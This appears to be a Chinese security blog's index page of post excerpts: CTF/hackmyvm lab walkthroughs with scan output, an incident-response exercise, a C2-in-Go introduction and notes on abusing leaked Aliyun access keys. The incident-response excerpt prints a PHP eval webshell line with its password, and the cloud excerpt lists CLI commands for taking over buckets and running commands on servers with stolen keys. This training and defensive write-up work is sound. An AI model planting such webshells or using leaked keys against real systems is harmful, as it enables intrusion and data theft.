mazesec-awker
一、信息收集主机发现 123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:03 (Unknown: locally administered)192.168.56.100 08:00:27:47:17:7f ...
玄机
做一做玄机、 学一学应急。 做了几个突然想起。博客开个贴子记录下来也是挺好的😋 第一章 应急响应- Linux入侵排查 web目录存在木马,请找到木马的密码提交 登录上服务器,将web目录打包。下载下来用d盾扫一波 1.php内容 .shell.php内容 index.php内容 index.php作用是在 /var/www/html/下生成.shell.php然后在.shell.php中写入<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?> 这个马的密码是hello 网站目录下面还有一个 shell(1).elf 放进ida里面看了一下,发现自己根本看不懂 就起了一个docker 将它在docker里面执行了一下 然后再看网络连接状态netstat -antlp 连接了10.11.55.21:3333
learn_to_write_a_C2_by_Go
近况: 清明假期第二天、还有些昨天哪些负面情绪😢。很难受,也很累 昨天发现自己在写东西的时候,可以让自己的暂时忽略掉这种负面情绪。 前几天chromos2me分享了一个新的C2框架,然后就想到了去年年底给chromos2me说过的要写一个极其简单的C2来着。 一直没写来着,今天趁机写了顺便放松一下自己吧。。。。。 😁 🔍什么是C2?C2即Command and Control C2服务器的概念基于命令和控制模型。攻击者扮演指挥官的角色,而受感染的设备则充当实现攻击者恶意命令的棋子 C2服务器充当攻击者和受感染设备之间通信的桥梁。出金各方之间的双向通信以及数据的传输 远控木马RATRAT(Remote Access Trojan)是攻击者用来在受感染的计算机上远程执行操作的工具。 🔍什么是RPC?RPC(Remote Procedure Call) 远程过程调用: 它是一种计算机通信协议。 允许程序在一个计算机上面调用另一个函数 从本地函数调用来说,我们在程序中调用一个函数。比如:...
hackmyvm-Principle
近况: 很难受、 也很累。 但是庆幸靶机很好 正值清明时节 清明时节雨纷纷 🌧️,路上行人欲断魂 😢。 靶机地址 信息收集主机发现 端口扫描 80端口仅仅是一个nginx 的欢迎界面而已 robots.txt的内容 hi.html的内容 hackme不存在 investigate的内容 根据提示对这个目录进行目录扫描 12345678910111213According to the Old Testament, the rainbow was created by God after the universal Flood. In the biblical account, it would appear as a sign of the divine will and to remind men of the promise made by God himself to Noah that he would never again destroy the earth with a flood.Maybe that's why I am a...
hackmyvm-Espo
靶机地址 信息收集主机发现 123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24 Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:0e (Unknown:...
hackmyvm-HackingToys
信息收集主机发现 123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)192.168.56.100 08:00:27:92:d2:b1 ...
CICD
CI/CDCI: 即 持续集成 ,是代码开发人员在将代码提交到代码存储库中。自动进行频繁的自动构建和测试阶段,频繁的将开发者的代码合并到主干,减少代码的质量问题:smile: 在多人协作的项目中,各开发人员负责各自的开发模块。每当完成一项需求后,开发人员需将代码提交至代码仓库。若每次提交后都人工进行构建和测试,工作量繁重且效率低下。而若等到一段时间后再统一测试,一旦发现问题,由于距离编写代码已过去一段时间,开发人员可能遗忘细节,导致修复困难重重。:face_with_head_bandage:为此,引入 Jenkins 等工具,在每次代码提交后自动执行构建和测试。若测试通过,代码自动合并至主分支;若不通过,则立即通知开发者修复。这种方式显著提升了开发效率,降低了问题排查和修复的成本。 关键组件 版本控制系统(VCS) 如 Git、SVN 等,用于管理代码的版本和多人协作,确保代码提交的追踪和管理。 构建工具 如 Maven、Gradle、Ant 等,负责将源代码编译成可执行文件或可部署的软件包。 自动化测试框架 如 JUnit、Selenium、Pytest...
云安全AKSK随笔
AliYyun给出的AKSK的作用 在阿里云,用户可以使用AccessKey(简称AK)构造一个API请求(或者使用云服务SDK)来操作资源。AccessKey包括AccessKey ID和AccessKey Secret。其中AccessKey ID用于标识用户,AccessKey Secret是用来验证用户身份合法性的密钥。AccessKey Secret必须保密。 AK/SK泄露的攻击面1.AK/SK接管存储桶 当泄露的AK/SK有对存储桶有操作权限的时候,可以在aliyun Cli配置AK/SK来接管存储桶 使用aliyun oss ls来列出桶 使用aliyun oss ls <桶的名称>列出桶里面的内容 2.AK/SK执行云服务器命令 当泄露的AK/SK对ECS有操作权限的时候 可以使用aliyun ecs DescribeInstances列出ECS资源 使用 aliyun ecs RunCommand --CommandContent "<命令内容>"...
hackmyvm-Smol
信息收集123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:10 (Unknown: locally administered)192.168.56.100 08:00:27:eb:ec:71 ...
hackmyvm-hero
信息收集12345678910┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)192.168.56.100 08:00:27:43:9b:54 PCS Systemtechnik GmbH192.168.56.108 08:00:27:b9:ee:14 PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by...